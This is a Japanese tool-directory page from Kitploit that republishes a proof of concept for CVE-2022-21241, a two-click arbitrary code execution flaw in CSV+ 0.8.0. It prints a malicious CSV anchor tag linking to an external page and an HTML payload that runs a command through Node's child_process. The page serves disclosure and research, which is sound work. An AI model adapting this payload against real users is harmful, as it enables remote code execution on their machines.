Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
csv-plus_vulnerability — 👻 [PoC] CSV+ 0.8.0 - 任意のコード実行 (CVE-2022-21241) | Kitploit
ツール/GitHubGitHub/nanaao/csv-plus_vulnerability
ペイロード生成脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用学習と教育
GitHubnanaao/csv-plus_vulnerability

csv-plus_vulnerability

👻 [PoC] CSV+ 0.8.0 - 任意のコード実行 (CVE-2022-21241)

リポジトリを見る
5544年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

csv-plus_vulnerability

👻 2クリック任意コード実行の脆弱性

PoC.gif

CVE-2022-21241

⚠
このPoCは、ユーザーに注意を促し、自身のCSV+の脆弱性を調査するために作成されたものであり、攻撃に使用することは禁止されています。

脆弱性

以下のバージョンが脆弱です。

  • CSV+ <= 0.8.0

攻撃者はNode.jsの機能を利用して任意のコードを実行できます。 悪意のあるjsコードを何らかのサイトに配置し、CSV+のHTMLインジェクション脆弱性を利用してaタグからリンクします。

PoC

scenario.png

悪意のあるCSVファイル

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>

https://electronooooo.htmlbin.net/xsscalc.html は一時的なリンクです。

悪意のあるHTMLファイル (calc)

<!DOCTYPE html>
<html>
    <head>
        <script>
            var cmd = "calc";
            require("child_process").exec(cmd);
        </script>
    </head>
    <body>
        Hi :)
    </body>
</html>
ツールをダウンロード